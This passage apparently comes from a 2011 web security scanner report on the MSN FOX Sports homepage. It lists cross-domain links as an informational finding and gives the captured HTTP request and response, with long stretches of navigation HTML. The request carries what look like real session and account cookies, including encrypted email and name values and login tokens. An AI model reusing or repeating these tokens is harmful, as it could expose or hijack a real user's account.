       
                   <a href="http://www.ticketsnow.com/NFL-Football-Tickets/NFL-Playoff-Tickets.html?partnerCode=foxnfl "><img src="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG" alt="" border="0" />
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.2. http://msn.foxsports.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?fb_xd_fragment HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://msn.foxsports.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: _chartbeat2=oxy92bi233plhtq3; NetInsightSessionID=1; _gig_mig=1; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pRME=; pExternalUser=; pLMD="2011-01-08 00:30:34"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; pUID=/k94ON71KoD/EYqOMDzIDg==; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; MUID=65AFF4B77A124856A6B4337A160FA285
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Cache-Control: max-age=34
Date: Sat, 08 Jan 2011 01:36:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 290066


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/js/vp.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<h3><a href="http://www.foxsportsbracket.com/" title="VOTE: TOP MOMENT" >VOTE: TOP MOMENT</a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too">
RB Clay, too
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too"></a>
...[SNIP]...



    <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all">Turns out Panthers have no Luck at all</a>
...[SNIP]...



            <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all"></a>
...[SNIP]...
<div class="subhead Rumors"><a href="http://www.yardbarker.com"><img src="/component/photo/BroughtToYouByYardbarker">
...[SNIP]...
<h3><a title="Are Seahawks fans getting ripped off at the concession stand?" href="http://network.yardbarker.com/all_sports/article_external/is_the_seahawks_12th_man_getting_ripped_off/3926828">Are Seahawks fans getting ripped off at the concession stand?</a>
...[SNIP]...
<h3><a title="&#8216;Homeless Radio Voice Guy&#8217; story shows the best and worst of internet age journalism" href="http://network.yardbarker.com/mlb/article_external/homeless_radio_voice_guy_story_shows_us_the_best_and_worst_of_journalism_in_the_age_of_the_internet/3926527">&#8216;Homeless Radio Voice Guy&#8217; story shows the best and worst of internet age journalism</a>
...[SNIP]...
<h3><a title="Can Elway return Denver to the glory days?" href="http://network.yardbarker.com/nfl/article_external/can_john_elway_return_denver_to_their_days_of_glory/3926452">Can Elway return Denver to the glory days?</a>
...[SNIP]...
<div class="foot"><a title="MORE RUMORS" class="more" href="http://www.yardbarker.com/rumors">MORE RUMORS&nbsp;&raquo;</a>
...[SNIP]...
<td class="fs-promo-card-image" width="65">
                   <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd"><img alt="Gridiron Dynasty" border="0" src="/component/photo/Gridiron_Dynasty_65x48" />
...[SNIP]...
<strong><a href="http://www.whatifsports.com/x.asp?r=678106&u=gd">Gridiron Dynasty</a>
...[SNIP]...
<div>
                           <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd" target="_blank">PLAY NOW</a>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
<h4 class="story-data" title=" ">
                   
                       <a href="http://www.foxsportsarizona.com/01/06/11/Dont-forget-the-defenses/landing.html?blockID=386209&amp;feedID=4633" title="What about us?">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/010611-CFB-Nick-Fairley-WHAT-ABOUT-US-JW-PI_20110106165621274_196_100.JPG" class="story-image" width="196" height="100" alt="
...[SNIP]...
</a>
                       <a href="http://www.foxsportsarizona.com/01/06/11/Dont-forget-the-defenses/landing.html?blockID=386209&amp;feedID=4633" title="What about us?">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportsarizona.com/01/06/11/Dont-forget-the-defenses/landing.html?blockID=386209&amp;feedID=4633" class="story-blurb" title="What about us?">
                           Defensive studs like Auburn's Fairley will have a say in the
outcome of the BCS title game.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportsarizona.com/01/06/11/Dont-forget-the-defenses/landing.html?blockID=386209&amp;feedID=4633" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
<h4 class="story-data" title=" ">
                   
                       <a href="http://www.foxsportswisconsin.com/01/07/11/Big-win-still-missing-for-Rodgers/landing.html?blockID=386544&amp;feedID=5059" title="Stare master">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/07/010711-NFL-rodgers-PI-AM_20110107180445349_196_100.JPG" class="story-image" width="196" height="100" alt="Aaron Rodgers #12 o
...[SNIP]...
</a>
                       <a href="http://www.foxsportswisconsin.com/01/07/11/Big-win-still-missing-for-Rodgers/landing.html?blockID=386544&amp;feedID=5059" title="Stare master">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportswisconsin.com/01/07/11/Big-win-still-missing-for-Rodgers/landing.html?blockID=386544&amp;feedID=5059" class="story-blurb" title="Stare master">
                           Packers' Rodgers doesn't flinch under intense pressure.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportswisconsin.com/01/07/11/Big-win-still-missing-for-Rodgers/landing.html?blockID=386544&amp;feedID=5059" title="FOX SPORTS WISCONSIN">
                    FOX SPORTS WISCONSIN&nbsp;&raquo;
                       </a>
...[SNIP]...
<h4 class="story-data" title="Bill Reiter">
                   
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/010611-Road-Warrior-SW-PI_20110106211141407_196_100.JPG" class="story-image" width="196" height="100" alt="LeBron James (Phot
...[SNIP]...
</a>
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" class="story-blurb" title="Road warrior">
